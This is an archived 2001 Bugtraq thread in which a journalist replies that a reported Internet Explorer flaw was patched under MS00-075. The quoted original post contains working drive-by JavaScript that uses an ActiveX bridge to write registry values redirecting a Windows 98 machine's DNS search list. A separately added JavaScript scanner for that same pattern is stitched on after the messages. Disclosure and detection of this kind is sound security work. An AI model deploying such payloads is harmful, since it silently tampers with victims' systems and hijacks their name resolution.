Bugtraq mailing list archives

RE: javascript can write anything to windows98 registry


From: Rob Lemos <rlemos () zdnet com>
Date: Wed, 29 Aug 2001 08:33:21 -0700

This is the basis for the Trojan.Offensive worm. The problem was originally discovered almost a year ago and was 
patched last November.

Here's the Microsoft link: 
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-075.asp

And my article: http://news.cnet.com/news/0-1003-200-6961705.html

-R

Robert Lemos
Senior writer -- Security, Privacy and e-Crime
ZDNet News/CNet News.com 
PGP key: 0x6E1966EB


 -----Original Message-----
From:         "Marcin Jackowski" <marcin () jackowski net>@INTERNET@INTERLIANT@ZDNET  
Sent: Tuesday, August 28, 2001 8:21 AM
To:   bugtraq () securityfocus com@INTERNET@INTERLIANT@ZDNET
Subject:      javascript can write anything to windows98 registry

here's code from
www.4y4y.net:88/ls.html
it can write any value to windows98 registry
solution: disable JavaScript in Internet Explorer
tested on IE5.5
Marcin Jackowski
---------------------------------------------------------------
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
    try{
        a1=document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();Shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        try{
            Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
        }
        catch(e){}
    }
    catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
    try{
        a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a2.createInstance();Shl = a2.GetObject();
        a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        try{
            Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
        }
        catch(e){}
    }
    catch(e){}
}setTimeout("yuzi2()",1000);
</script>
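
A defender-side check for the pattern in the quoted post, as an added example that is not part of either message: it scans page source for the `com.ms.activeX.ActiveXComponent` applet, the CLSIDs passed to `setCLSID`, and double-quoted `RegWrite` targets. The function name `scanPage`, its report fields and the sample value `example.invalid` are assumptions made for the example.

```javascript
// Added example: static scan of HTML/script source for the pattern in the quoted post.
// Class name, method names and registry path come from the post; scanPage, its
// report fields and the SAMPLE value "example.invalid" are constructed here.
const BRIDGE = /<applet\b[^>]*\bcode\s*=\s*["']?com\.ms\.activeX\.ActiveXComponent\b/i;
const SET_CLSID = /\.setCLSID\(\s*["'](\{[0-9A-Fa-f-]{36}\})["']\s*\)/g;
const REG_WRITE = /\.RegWrite\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*"((?:[^"\\]|\\.)*)"/g;
const TCPIP_KEY = "hklm\\system\\currentcontrolset\\services\\vxd\\mstcp\\";

// Turn JavaScript string escapes such as a doubled backslash back into one character.
const unescapeJs = (s) => s.replace(/\\(.)/g, "$1");

function scanPage(source) {
  // Mail and archive software hard-wraps long lines, sometimes inside a string
  // literal, so line breaks are removed before matching.
  const flat = source.replace(/\r?\n/g, "");
  const clsids = [...new Set([...flat.matchAll(SET_CLSID)].map((m) => m[1].toUpperCase()))];
  const registryWrites = [...flat.matchAll(REG_WRITE)].map((m) => ({
    key: unescapeJs(m[1]),
    value: unescapeJs(m[2]),
  }));
  const usesBridge = BRIDGE.test(flat);
  return {
    usesBridge,
    clsids,
    registryWrites,
    // Writes under the MSTCP key change the Windows 9x TCP/IP (DNS) settings.
    changesTcpip: registryWrites.some((w) => w.key.toLowerCase().startsWith(TCPIP_KEY)),
    suspicious: usesBridge && (clsids.length > 0 || registryWrites.length > 0),
  };
}

// Constructed sample modelled on the post, including a line wrapped mid-string.
const SAMPLE = [
  '<script>',
  'document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");',
  'a1=document.applets[0];',
  'a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");',
  'a1.createInstance();Shl = a1.GetObject();',
  'Shl.RegWrite("HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VxD\\\\MSTCP\\\\SearchList","exam',
  'ple.invalid");',
  '</script>',
].join("\n");

console.log(JSON.stringify(scanPage(SAMPLE), null, 2));
```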
